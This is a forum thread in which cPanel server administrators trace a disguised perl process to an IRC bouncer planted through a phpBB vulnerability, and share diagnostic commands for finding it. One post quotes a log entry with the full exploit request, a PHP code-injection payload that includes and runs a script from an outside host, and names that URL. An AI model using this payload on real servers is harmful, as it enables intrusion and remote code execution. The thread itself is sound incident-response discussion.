The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

perl process --> /usr/local/firewall

Discussion in 'General Discussion' started by Def, Nov 8, 2005.

1. Def

Def Well-Known Member

Probably once a day I have a perl process that seems to get hung and causes loads to go up a bit. I do a ps -f <pid> and it shows as /usr/local/firewall . I don't see a firewall file or directory under /usr/local so I'm not sure what's going on with this. I end up killing the pid to get the loads back down and I/O wait back to normal again.

Is this iptables hanging or some exploit. I've run rkhunter (found nothing) and checked /tmp and /dev/shm for anything out of the ordinary (found nothing). If this is actually my firewall that I'm killing what is the command to restart it?

Thanks.

2. DigiCrime

DigiCrime Well-Known Member

Sure thats not an anti-dos module?

3. Def

Def Well-Known Member

Not sure. That's why I'm asking ;)

4. acenetryan

acenetryan Well-Known Member
    PartnerNOC

I have been seeing this as well.

I am trying to locate the working directory for this script. If anyone has further insight, it would be appreciated.

ps aux | grep firewall

will give you the process ID.

lsof | grep PID

This shows the working directory of the process to be "/". I've searched most of the server and have been unable to find anything pertaining to the location of this script and how it gets run.

I believe the process is an IRC daemon. One of the lines in the lsof shows:

perl <PID> <USERNAME> 15u IPv4 64850345 TCP <SERVERNAME>:43528-><SOMEDOMAINNAME>:ircd (SYN_SENT)

I've taken out sensitive information, but note the ircd at the end of the line.

Anyone know any other way to locate the working directory of a script, this one seems to hide itself well.

5. chirpy

chirpy Well-Known Member

It's probably best to use:

lsof -p PID

Which will more reliably list the information about the process. You can also look in /proc/PID/* for more details on the process.

The most important bit of information is the user under which it runs. If it's running under nobody then you most likely have vulnerable PHP scripts in the server (make sure all those phpBB installs are running at least v2.0.18 all others are vulnerable to exploitation).

Check common directories used by script exploits:

/tmp
    /var/tmp
    /dev/shm
    /usr/local/apache/proxy/

6. dv2support

dv2support Member
    PartnerNOC

7. compunet2

compunet2 Well-Known Member

Same here... the source isn't in any of the normal locations (/tmp, /tmp/var, etc.). Anyway to find the source file?

8. derekg

derekg Registered

It's an exploit

It's a phpBB expoit. It installs and runs irc bouncer on your server. There is no such file as /usr/local/firewall on your server, so don't bother looking for it. Search your Apache logs for entries like this one:

63.247.81.34 - - [10/Dec/2005:07:38:09 -0500] "GET /forums/viewtopic.php?t=70&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 12718 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t **** Aleks)"

At http://www.yatas.com/phpbb_private.txt?& you will find the script that does it.

Now, I have upgraded phpBB to the lastest version through WHM, but it didn't help. It didn't help because the upgrade in WHM is broken, as it will not upgrade .php files which belong to phpBB under individual domains. The result of the upgrade is such, that after the upgrade, if you access any of the phpBB bulletins on your server, you will still see the old phpBB version number...

For me getting rid of phpBB is not an option, because at least 15% of my users have it installed. Just deleting this bug-ridden piece of s..tware would be the best thing to do, but you know how users are...

To the CPanel programmers: Can you PLEASE fix this so that when we upgrade phpBB installation from WHM, it REALLY upgrades it??? And I mean for ALL THE DOMAINS that are hosted on the server?

Either that or a script we could run that would take care of all phpBB files under individual domains...